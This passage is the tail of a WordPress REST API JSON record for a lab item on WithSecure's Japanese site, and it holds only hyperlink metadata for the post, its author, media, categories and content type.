<\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item\/10579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/users\/3"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/media?parent=10579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/categories?post=10579"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/jp-ja\/wp-json\/wp\/v2\/labs_content_type?post=10579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}